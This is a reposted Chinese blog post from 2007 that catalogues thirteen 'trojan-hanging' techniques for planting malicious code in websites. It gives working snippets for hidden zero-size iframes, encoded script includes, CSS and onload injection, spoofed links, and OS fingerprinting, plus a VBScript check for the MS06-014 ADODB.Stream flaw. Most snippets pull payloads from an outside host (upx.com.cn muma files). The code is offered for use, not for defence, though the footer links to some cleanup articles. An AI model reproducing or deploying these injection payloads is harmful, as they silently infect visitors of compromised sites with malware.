目前比较常用的挂马代码

转载 2007年09月25日 10:40:00

一:框架挂马  
<iframe src=地址 width=0 height=0></iframe>  
 
二:js文件挂马  
首先将以下代码  
document.write("<iframe width='0' height='0' src='地址'></iframe>");  
保存为xxx.js,  
则JS挂马代码为  
<script language=javascript src=xxx.js></script>  
 
三:js变形加密  
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>  
muma.txt可改成任意后缀  
 
四:body挂马  
<body onload="window.location='地址';"></body>  
 
五:隐蔽挂马  
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://www.upx.com.cn/muma.htm/"></iframe>';  
 
六:css中挂马  
body {  
background-image: url('javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>")')}  
 
七:JAJA挂马  
<SCRIPT language=javascript>  
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");  
</script>  
 
八:图片伪装  
<html>  
<iframe src="网马地址" height=0 width=0></iframe>  
<img src="图片地址"></center>  
</html>  
 
九:伪装调用:  
<frameset rows="444,0" cols="*">  
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">  
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">  
</frameset>  
 
十:高级欺骗  
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>  
<SCRIPT Language="JavaScript">  
function www_163_com ()  
{  
var url="网马地址";  
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");  
}  
</SCRIPT>  
 
十一:判断系统代码  
 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD><TITLE>404</TITLE>  
<META http-equiv=Content-Type content="text/html; charset=windows-1252">  
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>  
<BODY>  
<SCRIPT language=javascript>  
window.status="";  
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)  
window.location.href="tk.htm";  
else  
window.location.href="upx06014.htm";  
</SCRIPT>  
</BODY></HTML>  
 
十二:判断是否有ms06014代码  
 
<script language=VBScript>  
on error resume next  
set server = document.createElement("object")  
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"  
set File = server.createobject(Adodb.Stream,"")  
if Not Err.Number = 0 then  
err.clear  
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")  
else  
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")  
end if  
</script>  
 
十三:智能读取js的代码demo  
 
//读娶src的对象  
var v = document.getElementById("advjs");  
//读娶src的参数  
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));  
 
document.write("<iframe src=/"http://www.upx.com.cn/1/"+u_num+".htm/" width=/"0/" height=/"0/" frameborder=/"0/"></iframe>");  
document.writeln("<!DOCTYPE HTML PUBLIC /"-////W3C////DTD HTML 4.0 Transitional////EN/">");  
document.writeln("<HTML><HEAD>");  
document.writeln("<META http-equiv=Content-Type content=/"text//html; charset=big5/">");  
document.writeln("<META content=/"MSHTML 6.00.2900.3059/" name=GENERATOR><//HEAD>");  
document.writeln("<BODY> ");  
document.writeln("<DIV style=/"CURSOR: url(/'http:////www.upx.com.cn//demo.js/')/">");  
document.writeln("<DIV ");  
document.writeln("style=/"CURSOR: url(/'http:////www.upx.com.cn//demo.js/')/"><//DIV><//DIV><//BODY><//HTML>")  
 
//分析src的参数函数  
function getUrlParameterAdv(asName,lsURL){  
 
loU = lsURL.split("?");  
if (loU.length>1){  
 
var loallPm = loU[1].split("&");  
 
for (var i=0; i<loallPm.length; i++){  
var loPm = loallPm.split("=");  
if (loPm[0]==asName){  
if (loPm.length>1){  
return loPm[1];  
}else{  
return "";  
}  
}  
}  
}  
return null;  
}   

寻找PHP(网站)挂马,后门

一 php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代...
  • MiltonZhong
  • MiltonZhong
  • 2013年08月02日 15:29
  • 2637

常见JS挂马方法及如何防止网站被黑客挂马?

最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站被挂马了,导致网站被连累了。在此,借助seo思维博客的平台...
  • z10160
  • z10160
  • 2013年09月22日 08:02
  • 2190

在eclipse中使用svn来比较版本差异及查看各个版本的代码

在eclipse中使用svn来比较版本差异和通过切换来查看各个版本的代码
  • hawanglc
  • hawanglc
  • 2017年01月12日 17:46
  • 7191

怎样防止网站被JS挂马的代码和查杀方法

JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。     这种方法使用的关键代码如...
  • qq413041153
  • qq413041153
  • 2013年03月09日 12:21
  • 2158

安卓WebView中接口隐患(远程代码执行漏洞)与手机挂马利用

0×00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等)。类似PC下directUI的功能。在...
  • lingfong_cool
  • lingfong_cool
  • 2013年09月16日 16:57
  • 1156

正确的4种挂马方式(属于比较简单的) - 京华志

  • 2011年10月04日 15:58
  • 1KB
  • 下载

VBS清除全盘网页文件被挂马代码【VBS专杀】

由于有些病毒很恶心的感染了全盘文件, 感染exe还不说,还感染网页文件,真的极度变态恶心啊!杀毒软件清除exe文件还好,但是网页文件会被直接删除掉,好吧,自己动手,丰衣足食。用vbs写了这个脚本。 ...
  • u010038480
  • u010038480
  • 2013年05月25日 22:19
  • 548

最新挂马代码,第一个先报!

最新挂马代码,第一个先报! 我的站www.xzbaojia.com  www.yzbaojia.com  全被挂马了,代码如下:网站被挂马,大量的马,, 所有的网页全被挂了,无一漏网,但特点跟...
  • q123456789098
  • q123456789098
  • 2011年12月09日 13:32
  • 899

很多网站被挂马确找不到代码,arp挂马原理剖析

不管是访问服务器上的任何网页,就连404的页面也会在 ;,挂马的位置在标记左右,上面这段恶意代码,它会 每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,...
  • yuexi_hou
  • yuexi_hou
  • 2013年11月26日 13:09
  • 1385

挂马代码大全

  • 2012年08月09日 23:21
  • 17KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:目前比较常用的挂马代码
举报原因:
原因补充:

(最多只允许输入30个字)